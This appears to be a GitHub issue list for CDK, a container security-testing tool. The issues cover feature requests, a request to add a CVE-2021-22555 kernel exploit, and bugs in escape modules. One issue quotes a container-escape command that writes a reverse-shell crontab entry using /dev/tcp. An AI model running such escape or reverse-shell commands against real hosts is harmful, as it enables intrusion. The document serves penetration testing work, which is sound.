CDK
CDK copied to clipboard
cdk-team
📦 Make security testing of K8s, Docker, and Containerd easier.
ref. - https://mp.weixin.qq.com/s/yfBgIr393WzcyKDCz-74WA
Requirement: * colorful * uniform interface * do not specify \t \n repeatedly in code * especially, in Evaluate module
* Support Self Update * Maybe we can use https://github.com/rhysd/go-github-selfupdate
 判断拉取失败,但是打印出的返回包中实际上已获取到信息,应该判定成功并输出到文件中。 secret、psp、configmap这三个都是这样。  可能需要修改这部分代码
From: @nikitastupin in #20 The reason why I didn't implement actual `CAP_SYS_MODULE` escape in CDK is because each kernel version and architecture combination requires kernel module built specifically for it....
可以更新CVE-2021-22555到CDK中吗?让支持centos内核版本,列如:Linux 3.10.0-1160.25.1.el7.x86_64 #1 SMP Wed Apr 28 21:49:45 UTC 2021 x86_64 GNU/Linux [cve-2021-22555/exploit.c](https://github.com/google/security-research/blob/master/pocs/linux/cve-2021-22555/exploit.c) [一个内核网络漏洞详解|容器逃逸](https://mp.weixin.qq.com/s/zFDNafu6ArKKwmlkwf-A6w) [CVE-2021-22555](https://github.com/duowen1/Container-escape-exps/blob/main/CVE-2021-22555/readme.md) [CVE-2021-22555 2字节堆溢出写0漏洞提权分析](https://www.anquanke.com/post/id/254027)
这个方法可行吗?根据debugfs里stat读取文件信息,根据这个回显里的信息,将payload写入一些文件当中。 还有很多利用方式,来使内核调用这种替换的文件,比如说利用内核转储之类的 我只是个菜鸡,想到这个地方,麻烦大佬们指正
需要一个解释说明各 release binary 区别的文档(备忘,近期编写)。 > In the current major release we added a lightweight version, it’s prepared for short-life container shells such as Serverless functions. We add build tags in...
## 问题描述 执行runc-pwn模块,报出`cannot find RunC process inside container, exit.`之后,直接退出,没发生任何事就Finished。 在87行的if判断中直接return退出了函数,导致宿主机还没来得及执行exec命令,目标容器就已经退出了pid的监听。一开始宿主机创建容器时runc执行完就退出了,无法获取runc的pid。 > https://github.com/cdk-team/CDK/blob/b0ca845156bd9ef8c2d2ce13ab33699f04b9047d/pkg/exploit/docker_runc.go#L87-L90 ## 附加信息(Additional Information) 1、执行 `cdk evaluate --full` 的返回结果 ``` $ ./cdk evaluate --full CDK (Container DucK) CDK Version(GitCommit):...
```bash root@79a270635491:/# ./cdk run mount-cgroup "echo \"* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'\" >> /etc/crontab" 2023/10/17 04:25:59 current cgroup for exploit: memory 2023/10/17 04:25:59...
